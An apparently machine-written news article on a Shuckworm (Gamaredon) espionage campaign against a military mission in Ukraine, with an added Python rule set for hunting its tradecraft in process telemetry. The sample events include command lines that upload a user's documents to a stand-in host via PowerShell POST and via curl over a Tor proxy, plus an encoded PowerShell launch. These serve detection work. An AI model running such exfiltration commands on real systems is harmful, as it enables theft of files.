Ethical Hacking News
A Russia-linked APT group known as Shuckworm (also tracked as Gamaredon) has targeted a Western country's military mission based in Ukraine with an updated version of the GammaSteel infostealer. The attack marks a notable increase in sophistication for a group that has focused on Ukrainian targets since 2013.

Key points:
The attack on a military mission based in Ukraine marks an increase in sophistication for the Russia-linked group.
An infected removable drive served as the initial access vector, followed by a multi-stage, obfuscated attack chain.
The GammaSteel infostealer exfiltrated system metadata and files through several channels, including PowerShell web requests and cURL routed over Tor.
Shuckworm's focus on Ukraine has continued into 2025.
The group compensates for its limited tooling by making small, frequent modifications to its code and by abusing legitimate web services.
The campaign shows that Shuckworm remains committed to refining its tactics and tools to meet its espionage objectives.
The threat landscape has seen a notable escalation with the targeting of a Western country's military mission based in Ukraine by the APT group known as Shuckworm. The attack, which began on February 26, 2025, marks a significant increase in sophistication for this Russia-linked group, which is also tracked as Gamaredon, Armageddon, Primitive Bear, and ACTINIUM.

The mission was compromised through an infected removable drive as the initial access vector, according to a report published by Symantec's Threat Hunter Team. The group then deployed a multi-stage, obfuscated attack chain that culminated in the GammaSteel infostealer. This tool, an updated version of the GammaSteel infostealer Shuckworm used in previous attacks, supports multiple exfiltration methods, including the write.as service, cURL, and Tor.
The first evidence of compromise was the creation of a Windows Registry value under the UserAssist key, recorded when "mshta.exe" was launched via "explorer.exe" to kick off a multi-stage infection. The first-stage file, named "NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms" to resemble a registry transaction log, reached its C2 infrastructure through URLs hosted on legitimate services such as Teletype, Telegram, and Telegraph. It then created shortcuts on removable and network drives that execute "mshta.exe" while hiding the malicious files, giving the malware a way to spread to further hosts.

In the final stage, a script contacted a C2 server, exfiltrated system metadata, and received a Base64-encoded payload that was executed as a PowerShell command. That command downloaded two further obfuscated scripts: one for reconnaissance and one that was an upgraded version of the GammaSteel infostealer. The latter attempted to exfiltrate files via a PowerShell web request and, as a fallback, used cURL through a Tor network proxy to obscure the originating IP address.
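The chain described in the two paragraphs above leaves recognisable traces in process-creation telemetry: mshta.exe started by explorer.exe against a file that is not an .hta, PowerShell run with an encoded command, PowerShell uploading data over HTTP, and curl.exe pointed at a local SOCKS proxy on a Tor port. The following detection logic is an added example written for this page, not code from the article or from Symantec's report; the event layout, the sample events, the file names other than the one quoted above, the hosts, and the assumption that Tor listens on its default ports 9050/9150 are all constructed for illustration.

```python
"""Hunt Shuckworm-style tradecraft in process-creation events (added example).

The events below are constructed to resemble Sysmon Event ID 1 fields
(ParentImage, Image, CommandLine); they are not real telemetry.
"""
import re
from typing import NamedTuple


class ProcEvent(NamedTuple):
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # full command line of the created process


# Assumption: the attacker relies on Tor's default SOCKS listener ports.
TOR_PROXY_PORTS = ("9050", "9150")


def _base(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    parent, child, low = _base(ev.parent_image), _base(ev.image), ev.command_line.lower()

    # Rule 1: mshta.exe launched from explorer.exe (a user opening a shortcut) and
    # pointed at something that is not an .hta file, e.g. a payload masquerading
    # as a registry transaction log (*.regtrans-ms) as in the chain above.
    if child == "mshta.exe" and parent == "explorer.exe":
        tokens = [a or b for a, b in re.findall(r'"([^"]+)"|(\S+)', ev.command_line)]
        targets = tokens[1:]  # drop argv[0]
        if targets and not any(t.lower().endswith(".hta") for t in targets):
            hits.append("mshta_non_hta_target")
        if "regtrans-ms" in low:
            hits.append("mshta_regtrans_masquerade")

    is_powershell = child in ("powershell.exe", "pwsh.exe")

    # Rule 2: PowerShell started with an encoded command, the way the Base64
    # payload returned by the C2 server was executed.
    if is_powershell and re.search(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s", low):
        hits.append("powershell_encoded_command")

    # Rule 3: a PowerShell web request that uploads data (POST, -InFile, UploadFile).
    if is_powershell and re.search(r"invoke-(?:webrequest|restmethod)|\biwr\b|\birm\b", low):
        if re.search(r"-method\s+post|-infile|\.uploadfile\(|-body", low):
            hits.append("powershell_web_upload")

    # Rule 4: curl.exe sent through a local SOCKS proxy listening on a Tor port,
    # the fallback exfiltration path used to hide the origin IP.
    if child == "curl.exe" and re.search(r"(?:--proxy|-x)\s+\S*socks|--socks[45]", low):
        if any(port in low for port in TOR_PROXY_PORTS):
            hits.append("curl_tor_proxy_exfil")

    return hits


def hunt(events) -> list:
    """Return (event index, rule name) pairs for every match in a batch of events."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed sample events: indexes 0, 2, 3 and 4 are malicious, 1 and 5 benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "E:\NTUSER.DAT.TMContainer00000000000000000001.regtrans-ms"'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\tools\report.hta"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoP -NonI -W Hidden -enc VwByAGkAdABlAC0ASABvAHMAdAAgADEA"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoP -W Hidden -c "Invoke-WebRequest -Uri https://example.invalid/upload -Method Post -InFile C:\Users\u\Documents\orders.pdf"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe --proxy socks5h://127.0.0.1:9050 -T C:\Users\u\Documents\orders.pdf https://example.invalid/upload"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://example.invalid'),
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

Rule 1 is the highest-signal check because mshta.exe rarely has a legitimate reason to be started from a shortcut against a file without an .hta extension; rules 2 to 4 fire on behaviour that also has benign uses, so in production they are better used to raise the score of a host that already tripped rule 1 than as stand-alone alerts.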
Symantec's Threat Hunter Team observed that Shuckworm's relentless focus on Ukraine has continued into 2025, with this attack marking an increase in sophistication. Although Shuckworm does not appear to have the same skill set as other Russian groups, it compensates for its limitations by continually making minor modifications to its code and by leveraging legitimate web services for command and control.

The group's actions underscore its narrow focus on entities within Ukraine for espionage purposes, and this campaign shows that Shuckworm remains committed to refining the tactics and tools it uses to achieve those objectives.

In conclusion, the attack attributed to Shuckworm is a reminder of an evolving threat landscape and of the need for vigilance among organizations worldwide. As APT groups continue to refine their techniques and expand their reach, security professionals must stay informed about emerging threats like Shuckworm.
Related Information:
https://www.ethicalhackingnews.com/articles/APT-Group-Shuckworm-Marks-Significant-Increase-in-Sophistication-with-Targeting-of-Military-Mission-in-Ukraine-ehn.shtml
https://securityaffairs.com/176433/apt/gamaredon-targeted-the-military-mission-of-a-western-country-based-in-ukraine.html
https://www.f-secure.com/v-descs/teletype.shtml
https://www.scam-detector.com/validator/teletype-in-review/
https://attack.mitre.org/groups/G0047/
https://en.wikipedia.org/wiki/Gamaredon
Published: Fri Apr 11 02:56:50 2025 by llama3.2 3B Q4_K_M